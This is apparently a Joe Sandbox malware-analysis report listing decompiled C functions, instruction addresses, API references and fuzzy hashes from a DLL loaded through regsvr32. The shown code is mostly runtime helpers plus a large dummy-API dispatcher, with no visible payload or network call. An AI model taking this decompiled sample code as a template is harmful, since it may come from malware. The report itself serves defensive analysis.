								__eflags = _t103 & 0x08000000;
								if((_t103 & 0x08000000) != 0) {
									__eflags = _t103 & 0x10000000;
									if((_t103 & 0x10000000) != 0) {
										asm("xgetbv");
										_v32 = _t75;
										_v28 = _t109;
										_t123 = 6;
										__eflags = (_v32 & _t123) - _t123;
										if((_v32 & _t123) == _t123) {
											_t78 =  *0x6e9fc010; // 0x6f
											_t79 = _t78 | 0x00000008;
											 *0x6e9fcff0 = 3;
											 *0x6e9fc010 = _t79;
											__eflags = _t93 & 0x00000020;
											if((_t93 & 0x00000020) != 0) {
												 *0x6e9fcff0 = 5;
												 *0x6e9fc010 = _t79 | 0x00000020;
												__eflags = (_t93 & 0xd0030000) - 0xd0030000;
												if((_t93 & 0xd0030000) == 0xd0030000) {
													__eflags = (_v32 & 0x000000e0) - 0xe0;
													if((_v32 & 0x000000e0) == 0xe0) {
														 *0x6e9fc010 =  *0x6e9fc010 | 0x00000040;
														__eflags =  *0x6e9fc010;
														 *0x6e9fcff0 = _t123;
													}
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
					} else {
						continue;
					}
					break;
				}
			}

0x6e9e8e01
0x6e9e8e13
0x6e9e8e13
0x6e9e8e16
0x6e9e8e1e
0x6e9e8e21
0x6e9e8e21
0x6e9e8e09
0x6e9e8e0f
0x6e9e8e11
0x6e9e8e22
0x6e9e8e26
0x6e9e961e
0x6e9e961f
0x6e9e9621
0x6e9e9627
0x6e9e9635
0x6e9e963a
0x6e9e963a
0x6e9e963b
0x6e9e963c
0x6e9e9644
0x6e9e9652
0x6e9e9657
0x6e9e9658
0x6e9e965b
0x6e9e9665
0x6e9e966e
0x6e9e9674
0x6e9e9676
0x6e9e967c
0x6e9e9682
0x6e9e9687
0x6e9e968b
0x6e9e968f
0x6e9e9690
0x6e9e9692
0x6e9e9695
0x6e9e969a
0x6e9e96a3
0x6e9e96b4
0x6e9e96bf
0x6e9e96c5
0x6e9e96c6
0x6e9e96cb
0x6e9e96ce
0x6e9e96d3
0x6e9e96d8
0x6e9e96db
0x6e9e96de
0x6e9e96e1
0x6e9e9726
0x6e9e9726
0x6e9e96e3
0x6e9e96e6
0x6e9e96eb
0x6e9e96f0
0x6e9e9715
0x6e9e9715
0x6e9e971b
0x6e9e971e
0x6e9e96f2
0x6e9e96f2
0x6e9e96f7
0x00000000
0x6e9e96f9
0x6e9e96f9
0x6e9e96fe
0x00000000
0x6e9e9700
0x6e9e9700
0x6e9e9705
0x00000000
0x6e9e9707
0x6e9e9707
0x6e9e970c
0x00000000
0x6e9e970e
0x6e9e970e
0x6e9e9713
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9e9713
0x6e9e970c
0x6e9e9705
0x6e9e96fe
0x6e9e96f7
0x6e9e96f0
0x6e9e972c
0x6e9e9731
0x6e9e9732
0x6e9e9735
0x6e9e9738
0x6e9e9769
0x6e9e973a
0x6e9e973c
0x6e9e973d
0x6e9e9742
0x6e9e9745
0x6e9e9747
0x6e9e974a
0x6e9e974d
0x6e9e9750
0x6e9e9753
0x6e9e9756
0x6e9e975c
0x6e9e9761
0x6e9e9761
0x6e9e975c
0x6e9e976c
0x6e9e9771
0x6e9e9774
0x6e9e977e
0x6e9e9783
0x6e9e9789
0x6e9e978f
0x6e9e9792
0x6e9e979c
0x6e9e97a1
0x6e9e97a7
0x6e9e97a9
0x6e9e97af
0x6e9e97b3
0x6e9e97b6
0x6e9e97b9
0x6e9e97c4
0x6e9e97c7
0x6e9e97c9
0x6e9e97cb
0x6e9e97d0
0x6e9e97d3
0x6e9e97dd
0x6e9e97e2
0x6e9e97e5
0x6e9e97ea
0x6e9e97f4
0x6e9e9800
0x6e9e9802
0x6e9e9811
0x6e9e9813
0x6e9e9815
0x6e9e9815
0x6e9e981c
0x6e9e981c
0x6e9e9813
0x6e9e9802
0x6e9e97e5
0x6e9e97c9
0x6e9e97af
0x6e9e97a7
0x6e9e9824
0x6e9e9825
0x6e9e9828
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9e8e11

APIs

stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6E9E9644

Part of subcall function 6E9EA50C: RaiseException.KERNEL32(E06D7363,00000001,00000003,6E9E9657,?,?,?,6E9E9657,?,6E9FA538), ref: 6E9EA56C

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ExceptionRaisestdext::threads::lock_error::lock_error
String ID:
API String ID: 3447279179-0
Opcode ID: 77c3f3b2d054159aa8d3e237ede0f444d0395926213388058ec1f73d78c12703
Instruction ID: f56a5adcc8137bd050ae1b8faf8f7a8ad5e317d8c707eb74a316183c9c2a9f4e
Opcode Fuzzy Hash: 77c3f3b2d054159aa8d3e237ede0f444d0395926213388058ec1f73d78c12703
Instruction Fuzzy Hash: AAF0B43080420DF68B16A6F5E8549EDB72C5E51218B504965AB2499DA0EF70E6168DC4

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E1A60 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E9E1A60(void* __ebx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __ebp;
				intOrPtr _t16;
				void* _t23;

				_t23 = __ebx;
				_v12 = _a4 + 0x23;
				_t24 = _v12;
				if(_v12 <= _a4) {
					E6E9E6DB0();
				}
				_t26 = _v12;
				_t16 = E6E9E6AF0(_v12); // executed
				_v8 = _t16;
				do {
					if(_v8 == 0) {
						do {
							E6E9EC25F(_t23, _t24, _t26, __eflags);
							__eflags = 0;
						} while (0 != 0);
					} else {
					}
					_t24 = 0;
				} while (0 != 0);
				_v16 = _v8 + 0x00000023 & 0xffffffe0;
				 *((intOrPtr*)(_v16 + 0xfffffffffffffffc)) = _v8;
				return _v16;
			}

0x6e9e1a60
0x6e9e1a6c
0x6e9e1a6f
0x6e9e1a75
0x6e9e1a77
0x6e9e1a77
0x6e9e1a7c
0x6e9e1a80
0x6e9e1a85
0x6e9e1a88
0x6e9e1a8c
0x6e9e1a90
0x6e9e1a90
0x6e9e1a95
0x6e9e1a95
0x00000000
0x6e9e1a8e
0x6e9e1a99
0x6e9e1a99
0x6e9e1aa6
0x6e9e1ab7
0x6e9e1ac0

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 6E9E1A77

Part of subcall function 6E9E6DB0: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6E9E6DB9

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
String ID:
API String ID: 2103942186-0
Opcode ID: b76c894fc18651f0dd9a731209d8a28e113a96b5c028739d6e19fc56e693ba99
Instruction ID: 0c1a61c3e62911bb583e1787cafc347c45386cc53d6d7f2c641f6ada25f571fe
Opcode Fuzzy Hash: b76c894fc18651f0dd9a731209d8a28e113a96b5c028739d6e19fc56e693ba99
Instruction Fuzzy Hash: 1EF0AF70D0010CBBCB01DFE9D580AADF7B8AF85344F1081AADA01ABB48D730EA80CF85

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EE649 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9EE649(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6E9ED46D(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6e9fd9d8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6E9F0684();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E6E9EC4BB(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6e9ee64f
0x6e9ee655
0x6e9ee687
0x6e9ee68c
0x6e9ee692
0x00000000
0x6e9ee692
0x6e9ee659
0x6e9ee65b
0x6e9ee65b
0x6e9ee672
0x6e9ee67b
0x6e9ee683
0x00000000
0x00000000
0x6e9ee663
0x6e9ee665
0x00000000
0x00000000
0x6e9ee66e
0x6e9ee670
0x00000000
0x00000000
0x6e9ee670
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6E9F0272,?,00000000,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7), ref: 6E9EE67B

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a9a6810bffec7b56bcb7ae2705573d172ac353f767a3a28f89010ac6dceb7c40
Instruction ID: 234295da07b709b72a820f3ac5e7ae02516120a83249c55bda4c7447fe6781e3
Opcode Fuzzy Hash: a9a6810bffec7b56bcb7ae2705573d172ac353f767a3a28f89010ac6dceb7c40
Instruction Fuzzy Hash: 38E02B312456156BEB1316F65C1479A3A4C9FD2FA4F0206119F64DAFC0DB61D8008DE9

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E69A0 Relevance: 1.5, APIs: 1, Instructions: 32
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E9E69A0(CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;

				_v8 = E6E9E2310(0, 0);
				_v12 = CreateMutexA(0, 1, _a4);
				if( *((intOrPtr*)(E6E9E23D0(0, 0)))() != 0xb7) {
					return 1;
				}
				_v16 = E6E9E2700(0, 0);
				_v16(_v12);
				return 0;
			}

0x6e9e69af
0x6e9e69bd
0x6e9e69d0
0x00000000
0x6e9e69e9
0x6e9e69db
0x6e9e69e2
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000001,6E9E8BA2,00000000,00000000,?,6E9E8BA2,?), ref: 6E9E69BA

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 1bf1de3a6295c32259e3bbdbdba4fd3025900568e850f2af5441e8a4a44c5196
Instruction ID: a41d91431fd2dd1cf0215c17192de813dfd996d5472e8a7de5b8249d0246eb6c
Opcode Fuzzy Hash: 1bf1de3a6295c32259e3bbdbdba4fd3025900568e850f2af5441e8a4a44c5196
Instruction Fuzzy Hash: 8AF01C74A94308BBE750ABF48C06B9DBAA89F54B01F104854FB09EB5C1D6B19A408F62

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E19F0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E19F0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E6E9E2190(__eflags);
				_v8 =  *((intOrPtr*)(E6E9E12B0(_a8)));
				_v12 =  *((intOrPtr*)(E6E9E12B0(_a4)));
				return StrCmpIW(_v12, _v8);
			}

0x6e9e19f6
0x6e9e19fe
0x6e9e1a0c
0x6e9e1a1a
0x6e9e1a2b

APIs

StrCmpIW.SHLWAPI(?,00000000,?,6E9E5D13,?,6E9E5D13,?,00000000,6E9E265E,E463DA3C,?,6E9E5DAA), ref: 6E9E1A25

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
Instruction ID: ae4d4a1caabc2299a6006e19aaaf76a970159217e7d59239d8a9e68517a6b8ba
Opcode Fuzzy Hash: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
Instruction Fuzzy Hash: C5E0C079D04208AFCB05DFE4C84089EB7B8EF99300B108999E6159B300DB34DA409FD4

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EC2B0 Relevance: 1.5, APIs: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9EC2B0(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E6E9EDC0E(_a4); // executed
				return _t5;
			}

0x6e9ec2b9
0x6e9ec2c3
0x6e9ec2ca

APIs

_free.LIBCMT ref: 6E9EC2C3

Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: f23d6dbf9a85b4c9ad5e1337a3be32e45efe08f72eb37184d3eeb89a74728ec8
Instruction ID: 631096a15dff460f08b3015b079304aafd368ea9b19ef000ad0d8585e7950d66
Opcode Fuzzy Hash: f23d6dbf9a85b4c9ad5e1337a3be32e45efe08f72eb37184d3eeb89a74728ec8
Instruction Fuzzy Hash: C6C04C71500208FBDB059B95DA06A8E7BADDFC02A8F204054E51557650DBB1EE449A90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E6FF0 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E6FF0(long _a4) {
				void* _t4;

				_t4 = HeapAlloc(E6E9E83B0(), 0, _a4); // executed
				return _t4;
			}

0x6e9e6fff
0x6e9e7006

APIs

HeapAlloc.KERNEL32(00000000,00000000,?,?,6E9E7621,?,?), ref: 6E9E6FFF

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 8d2fc157657893beec9b0eaba60ce9a533408f5e6907ba399882b42dc233071f
Instruction ID: 46b022decdad034513aa93f94d2437f26d3cd6e38fc56865089b79c2200f4bfe
Opcode Fuzzy Hash: 8d2fc157657893beec9b0eaba60ce9a533408f5e6907ba399882b42dc233071f
Instruction Fuzzy Hash: 0BC09BF114470867D61056E4B809F96775C9F54601F044411BF0986540C671FC1045B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E9E8630 Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 327
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E6E9E8630(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				long _v12;
				int _v16;
				int _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				int _v44;
				struct HMENU__* _v48;
				intOrPtr _v52;
				int _v56;
				WCHAR* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				int _v72;
				intOrPtr _v76;
				long _v80;
				long _v84;
				long _v88;
				long _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				struct _SID_IDENTIFIER_AUTHORITY* _v120;
				int _v124;
				int _v128;
				int _v132;
				intOrPtr _v136;
				long _v140;
				long _v144;
				void* _v148;
				char _v164;
				void* _t116;
				intOrPtr _t118;
				void* _t180;

				if((E6E9E5D90(__eflags) & 0x000000ff) == 0) {
					L87:
					__eflags = 0;
					return 0;
				}
				_t184 = _a4;
				if(_a4 == 0) {
					goto L87;
				}
				_t116 = E6E9E5910(_t184);
				_t185 = _t116;
				if(_t116 == 0) {
					return 1;
				}
				_t118 = E6E9E7700(_t185);
				if(_t118 == 0) {
					return 1;
				}
				if(_a4 == 2) {
					_v12 = FormatMessageA(0, 0, 0, 0, 0, 0, 0);
					return _a4;
				}
				__eflags = _a4 - 3;
				if(_a4 == 3) {
					_v16 = TextOutW(0, 0, 0, 0, 0);
					return _a4;
				}
				__eflags = _a4 - 4;
				if(_a4 != 4) {
					__eflags = _a4 - 5;
					if(_a4 != 5) {
						__eflags = _a4 - 6;
						if(_a4 != 6) {
							__eflags = _a4 - 7;
							if(_a4 != 7) {
								__eflags = _a4 - 8;
								if(_a4 != 8) {
									__eflags = _a4 - 9;
									if(_a4 != 9) {
										__eflags = _a4 - 0xa;
										if(_a4 != 0xa) {
											__eflags = _a4 - 0xb;
											if(_a4 != 0xb) {
												__eflags = _a4 - 0xc;
												if(_a4 != 0xc) {
													__eflags = _a4 - 0xd;
													if(_a4 != 0xd) {
														__eflags = _a4 - 0xe;
														if(_a4 != 0xe) {
															__eflags = _a4 - 0xf;
															if(_a4 != 0xf) {
																__eflags = _a4 - 0x10;
																if(_a4 != 0x10) {
																	__eflags = _a4 - 0x11;
																	if(_a4 != 0x11) {
																		__eflags = _a4 - 0x12;
																		if(_a4 != 0x12) {
																			__eflags = _a4 - 0x13;
																			if(_a4 != 0x13) {
																				__eflags = _a4 - 0x14;
																				if(_a4 != 0x14) {
																					__eflags = _a4 - 0x15;
																					if(_a4 != 0x15) {
																						__eflags = _a4 - 0x16;
																						if(_a4 != 0x16) {
																							__eflags = _a4 - 0x17;
																							if(_a4 != 0x17) {
																								__eflags = _a4 - 0x18;
																								if(_a4 != 0x18) {
																									__eflags = _a4 - 0x19;
																									if(_a4 != 0x19) {
																										__eflags = _a4 - 0x1a;
																										if(_a4 != 0x1a) {
																											__eflags = _a4 - 0x1b;
																											if(_a4 != 0x1b) {
																												__eflags = _a4 - 1;
																												if(_a4 == 1) {
																													__eflags = _a8;
																													if(_a8 != 0) {
																														__eflags = E6E9E7670();
																														if(__eflags == 0) {
																															_t118 = E6E9E6960(_t180);
																															__eflags = _t118;
																															if(_t118 != 0) {
																																_t118 = E6E9E7770();
																																_v8 = _t118;
																																__eflags = _v8 - 1;
																																if(_v8 == 1) {
																																	__eflags = E6E9E71E0();
																																	if(__eflags == 0) {
																																		_t118 = E6E9E6390(__eflags);
																																	} else {
																																		_t118 = E6E9E6390(__eflags);
																																	}
																																}
																															}
																														} else {
																															_t118 = E6E9E6390(__eflags);
																														}
																													}
																												}
																												__eflags = _a4 - 0x1c;
																												if(_a4 != 0x1c) {
																													__eflags = _a4 - 0x1d;
																													if(_a4 != 0x1d) {
																														__eflags = _a4 - 0x1e;
																														if(_a4 != 0x1e) {
																															__eflags = _a4 - 0x1f;
																															if(_a4 != 0x1f) {
																																__eflags = _a4 - 0x20;
																																if(_a4 != 0x20) {
																																	__eflags = _a4 - 0x21;
																																	if(_a4 != 0x21) {
																																		__eflags = _a4 - 0x22;
																																		if(_a4 != 0x22) {
																																			__eflags = _a4 - 0x23;
																																			if(_a4 != 0x23) {
																																				__eflags = _a4 - 0x24;
																																				if(_a4 != 0x24) {
																																					goto L87;
																																				}
																																				_v148 = DuplicateIcon(0, 0);
																																				return _a4;
																																			}
																																			_v144 = SHStrDupA(0, 0);
																																			return _a4;
																																		}
																																		_v140 = SHStrDupW(0, 0);
																																		return _a4;
																																	}
																																	__imp__CreateMutexExW(0, 0, 0, 0);
																																	_v136 = _t118;
																																	return _a4;
																																}
																																_v132 = IsValidSid(0);
																																return _a4;
																															}
																															_v128 = IsValidAcl(0);
																															return _a4;
																														}
																														_v124 = DisableThreadLibraryCalls(0);
																														return _a4;
																													}
																													_v120 = GetSidIdentifierAuthority(0);
																													return _a4;
																												}
																												__imp__CoTaskMemAlloc(0);
																												_v116 = _t118;
																												return _a4;
																											}
																											__imp__CoCancelCall(0, 0);
																											_v112 = _t118;
																											return _a4;
																										}
																										__imp__CveEventWrite(0, 0);
																										_v108 = _t118;
																										return _a4;
																									}
																									__imp__RpcExceptionFilter(0);
																									_v104 = _t118;
																									return _a4;
																								}
																								_v100 = RevertToSelf();
																								return _a4;
																							}
																							__imp__IsTokenRestricted(0);
																							_v96 = _t118;
																							return _a4;
																						}
																						_v92 = GetProcessId(0);
																						return _a4;
																					}
																					_v88 = GetPriorityClass(0);
																					return _a4;
																				}
																				_v84 = GetVersion();
																				return _a4;
																			}
																			_v80 = GetMessageTime();
																			return _a4;
																		}
																		__imp__UuidCreate(0);
																		_v76 = _t118;
																		return _a4;
																	}
																	_v72 = GetConsoleCP();
																	return _a4;
																}
																__imp__DceErrorInqTextA(0, 0);
																_v68 = _t118;
																return _a4;
															}
															__imp__SHGetThreadRef(0);
															_v64 = _t118;
															return _a4;
														}
														_v60 = CharNextW(0);
														return _a4;
													}
													_v56 = SetFileAttributesW(0, 0);
													return _a4;
												}
												__imp__GetProductInfo(0, 0, 0, 0, 0);
												_v52 = _t118;
												return _a4;
											}
											_v48 = CreatePopupMenu();
											return _a4;
										}
										_v44 = FlattenPath(0);
										return _a4;
									}
									__imp__CoGetCallerTID(0);
									_v40 = _t118;
									return _a4;
								}
								__imp__CoCreateInstance( &_v164, 0, 0,  &_v164, 0);
								_v36 = _t118;
								return _a4;
							}
							__imp__OleInitialize(0);
							_v32 = _t118;
							return _a4;
						}
						__imp__CoInitialize(0);
						_v28 = _t118;
						return _a4;
					}
					_v24 = FormatMessageW(0, 0, 0, 0, 0, 0, 0);
					return _a4;
				} else {
					_v20 = TextOutA(0, 0, 0, 0, 0);
					return _a4;
				}
			}

0x6e9e8643
0x6e9e8a7e
0x6e9e8a7e
0x00000000
0x6e9e8a7e
0x6e9e8649
0x6e9e864d
0x00000000
0x00000000
0x6e9e8653
0x6e9e8658
0x6e9e865a
0x00000000
0x6e9e8a77
0x6e9e8660
0x6e9e8667
0x00000000
0x6e9e8a6e
0x6e9e8671
0x6e9e8687
0x00000000
0x6e9e868a
0x6e9e8692
0x6e9e8696
0x6e9e86a8
0x00000000
0x6e9e86ab
0x6e9e86b3
0x6e9e86b7
0x6e9e86d4
0x6e9e86d8
0x6e9e86f9
0x6e9e86fd
0x6e9e8712
0x6e9e8716
0x6e9e872b
0x6e9e872f
0x6e9e8756
0x6e9e875a
0x6e9e876f
0x6e9e8773
0x6e9e8788
0x6e9e878c
0x6e9e879f
0x6e9e87a3
0x6e9e87c0
0x6e9e87c4
0x6e9e87db
0x6e9e87df
0x6e9e87f4
0x6e9e87f8
0x6e9e880d
0x6e9e8811
0x6e9e8828
0x6e9e882c
0x6e9e883f
0x6e9e8843
0x6e9e8858
0x6e9e885c
0x6e9e886f
0x6e9e8873
0x6e9e8886
0x6e9e888a
0x6e9e889f
0x6e9e88a3
0x6e9e88b8
0x6e9e88bc
0x6e9e88d1
0x6e9e88d5
0x6e9e88e8
0x6e9e88ec
0x6e9e8901
0x6e9e8905
0x6e9e891c
0x6e9e8920
0x6e9e8937
0x6e9e893b
0x6e9e893d
0x6e9e8941
0x6e9e8948
0x6e9e894a
0x6e9e8953
0x6e9e8958
0x6e9e895a
0x6e9e895c
0x6e9e8961
0x6e9e8964
0x6e9e8968
0x6e9e896f
0x6e9e8971
0x6e9e897a
0x6e9e8973
0x6e9e8973
0x6e9e8973
0x6e9e8971
0x6e9e8968
0x6e9e894c
0x6e9e894c
0x6e9e894c
0x6e9e894a
0x6e9e8941
0x6e9e897f
0x6e9e8983
0x6e9e8998
0x6e9e899c
0x6e9e89b1
0x6e9e89b5
0x6e9e89ca
0x6e9e89ce
0x6e9e89e3
0x6e9e89e7
0x6e9e89fc
0x6e9e8a00
0x6e9e8a1b
0x6e9e8a1f
0x6e9e8a36
0x6e9e8a3a
0x6e9e8a51
0x6e9e8a55
0x00000000
0x6e9e8a75
0x6e9e8a61
0x00000000
0x6e9e8a67
0x6e9e8a46
0x00000000
0x6e9e8a4c
0x6e9e8a2b
0x00000000
0x6e9e8a31
0x6e9e8a0a
0x6e9e8a10
0x00000000
0x6e9e8a16
0x6e9e89f1
0x00000000
0x6e9e89f4
0x6e9e89d8
0x00000000
0x6e9e89db
0x6e9e89bf
0x00000000
0x6e9e89c2
0x6e9e89a6
0x00000000
0x6e9e89a9
0x6e9e8987
0x6e9e898d
0x00000000
0x6e9e8990
0x6e9e8926
0x6e9e892c
0x00000000
0x6e9e892f
0x6e9e890b
0x6e9e8911
0x00000000
0x6e9e8914
0x6e9e88f0
0x6e9e88f6
0x00000000
0x6e9e88f9
0x6e9e88dd
0x00000000
0x6e9e88e0
0x6e9e88c0
0x6e9e88c6
0x00000000
0x6e9e88c9
0x6e9e88ad
0x00000000
0x6e9e88b0
0x6e9e8894
0x00000000
0x6e9e8897
0x6e9e887b
0x00000000
0x6e9e887e
0x6e9e8864
0x00000000
0x6e9e8867
0x6e9e8847
0x6e9e884d
0x00000000
0x6e9e8850
0x6e9e8834
0x00000000
0x6e9e8837
0x6e9e8817
0x6e9e881d
0x00000000
0x6e9e8820
0x6e9e87fc
0x6e9e8802
0x00000000
0x6e9e8805
0x6e9e87e9
0x00000000
0x6e9e87ec
0x6e9e87d0
0x00000000
0x6e9e87d3
0x6e9e87af
0x6e9e87b5
0x00000000
0x6e9e87b8
0x6e9e8794
0x00000000
0x6e9e8797
0x6e9e877d
0x00000000
0x6e9e8780
0x6e9e875e
0x6e9e8764
0x00000000
0x6e9e8767
0x6e9e8745
0x6e9e874b
0x00000000
0x6e9e874e
0x6e9e871a
0x6e9e8720
0x00000000
0x6e9e8723
0x6e9e8701
0x6e9e8707
0x00000000
0x6e9e870a
0x6e9e86ee
0x00000000
0x6e9e86b9
0x6e9e86c9
0x00000000
0x6e9e86cc

APIs

Part of subcall function 6E9E5D90: LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E9E5EBF

